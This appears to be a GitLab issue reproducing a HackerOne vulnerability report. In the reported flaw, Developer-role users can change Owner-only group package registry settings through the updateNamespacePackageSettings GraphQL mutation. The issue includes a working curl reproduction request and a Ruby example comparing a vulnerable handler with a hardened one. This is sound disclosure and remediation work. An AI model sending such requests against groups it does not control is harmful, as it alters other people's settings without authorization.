
Group Setting Package & Registry is Exposed to Low Privilege User

HackerOne report #1103232 by vaib25vicky on 2021-02-14, assigned to @dcouture:


Report

Summary

Only the OWNER of the group can access & edit the package & registry settings.


BUT a low privilege user such as a Developer can also DISABLE package & registry settings by directly sending the request to the GraphQL API mutation updateNamespacePackageSettings:

curl --request POST \
  --url https://gitlab.com/api/graphql \
  --header 'Authorization: Bearer <TOKEN>' \
  --header 'Content-Type: application/json' \
  --data '{"query":"\nmutation m1{\n  updateNamespacePackageSettings(input:{namespacePath:\"newtestgroup4\",mavenDuplicatesAllowed:false}){\n    errors\n  }\n}\n\n","operationName":"m1"}'

Several reports were made with similar scenarios.

When designing a solution, please make sure it will fix the following HackerOne reports:

  1. #1104896
  2. #1265690
  3. #1278366
  4. #1423641
  5. #1423645

Steps to reproduce

  • Create a group and add a second user with the Developer permission.
  • As the Developer, run the mutation to DISABLE the Maven setting.

Replace newtestgroup4 with your group name and <TOKEN> with your personal access token.

curl --request POST \
  --url https://gitlab.com/api/graphql \
  --header 'Authorization: Bearer <TOKEN>' \
  --header 'Content-Type: application/json' \
  --data '{"query":"\nmutation m1{\n  updateNamespacePackageSettings(input:{namespacePath:\"newtestgroup4\",mavenDuplicatesAllowed:false}){\n    errors\n  }\n}\n\n","operationName":"m1"}'

Impact

Settings of a group impact ALL projects & subgroups under that group. So if a low privilege user DISABLES the Maven repository setting, then existing packages in those projects may be affected.
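The authorization gap the report describes, as an added example that is not GitLab's own code: a plain Ruby stand-in for the mutation handler, with the membership-only check beside an Owner-only check matching the rule the UI already enforces. Member names, the role table and the settings shape are constructed for the example.

```ruby
# Added example (not GitLab code). Models updateNamespacePackageSettings as a
# plain Ruby handler so the missing Owner check can be compared with a fixed one
# without a GraphQL server. Roles, members and the settings shape are assumed.

ROLE_RANK = { guest: 10, reporter: 20, developer: 30, maintainer: 40, owner: 50 }.freeze

# Constructed membership: group "newtestgroup4" with one Owner and one Developer.
MEMBERS = {
  "newtestgroup4" => { "alice" => :owner, "bob" => :developer }
}.freeze

def role_of(user, namespace_path)
  MEMBERS.fetch(namespace_path, {})[user]
end

def new_settings
  { maven_duplicates_allowed: true } # default: duplicate Maven packages allowed
end

# Vulnerable variant: any member may change namespace package settings, which is
# the behaviour in the report (a Developer disables the Maven setting).
def update_package_settings_vulnerable(settings, current_user, input)
  path = input[:namespace_path]
  return { errors: ["not a member of #{path}"] } if role_of(current_user, path).nil?
  settings[:maven_duplicates_allowed] = input[:maven_duplicates_allowed]
  { errors: [] }
end

# Hardened variant: check the caller's role against the same rule the UI enforces
# (Owner only) before touching any settings; the error text stays generic.
def update_package_settings_hardened(settings, current_user, input)
  path = input[:namespace_path]
  role = role_of(current_user, path)
  unless role && ROLE_RANK[role] >= ROLE_RANK[:owner]
    return { errors: ["You do not have permission to update package settings"] }
  end
  settings[:maven_duplicates_allowed] = input[:maven_duplicates_allowed]
  { errors: [] }
end

# The report's mutation input (namespacePath / mavenDuplicatesAllowed) as a hash.
REPORT_INPUT = { namespace_path: "newtestgroup4", maven_duplicates_allowed: false }.freeze

if __FILE__ == $PROGRAM_NAME
  %w[alice bob].each do |user|
    v = new_settings
    h = new_settings
    puts "#{user}: vulnerable=#{update_package_settings_vulnerable(v, user, REPORT_INPUT)} -> #{v}"
    puts "#{user}: hardened=#{update_package_settings_hardened(h, user, REPORT_INPUT)} -> #{h}"
  end
end
```

Run directly, the script shows the Developer "bob" succeeding against the vulnerable handler and being refused by the hardened one, while the Owner "alice" succeeds against both.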

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Michelle Torres